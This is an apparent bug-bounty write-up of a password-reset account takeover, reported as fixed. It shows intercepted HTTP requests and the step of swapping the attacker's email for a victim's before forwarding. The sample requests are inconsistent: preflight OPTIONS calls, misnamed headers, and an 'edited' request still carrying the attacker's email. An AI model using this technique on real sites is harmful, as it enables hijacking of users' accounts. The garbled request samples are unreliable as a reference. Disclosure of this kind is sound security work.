Account take over — Write up:)

Hello everyone, how are you all , I wish you all well, Most of the applications provide the user’s with functionality to “Reset Password” via email. This functionality has always been a part of interest for most of the Bounty Hunters or Security Researchers. From performing basic attacks such as Rate Limiting, Host Header Injections and performing account takeovers, this functionality is total fun and a big win to invest time in.

and i found this bug on this week

Reporting time 06 August 2020 16:15:22accepted time 06 August 2020Fixed bug time 06 August 2020 21:12

in this case, I will show you where is injection point and how to reproduce it

find reset password on application

Let’s assume you’re a hacker and you want to take over an account

find reset password on an applicationask for reset password on your mailopen your mail and set up a new passwordand capture HTTP request on the applicationOPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer:
https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: close

focus on email ducky%40example.com(this is hacker account)

and change to victim email example victim@exaple.com(change @ to %40 “victim%40example.com”)

and forward the request

OPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer:
https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: close
Cookie:
XSRF-TOKEN=JALKJDUIEHDjlkjlkjdoijekjIHJlkjlijdeoiujlkdamOIHJkjoi3j298jiJOIJ8UJLIJlkjoijo
session=ijoi8UOIJOIJKlj98u9jKJLJ198UJLKJLKJJIJijiklkjoijlkj&*^&%*(HJhiu*&8udk{"email":"ducky@example.com","password":"Jakarta123!","c_password":"Jakarta123!","token":"*jdiujoij9IOK98uoiKJ98UjoiKJ098"}

look at the bold text its hacker account and change to victim account, lets forward the request and stop the capture

finally, victim account has been successful to take over

Photo by Sharon McCutcheon on Unsplash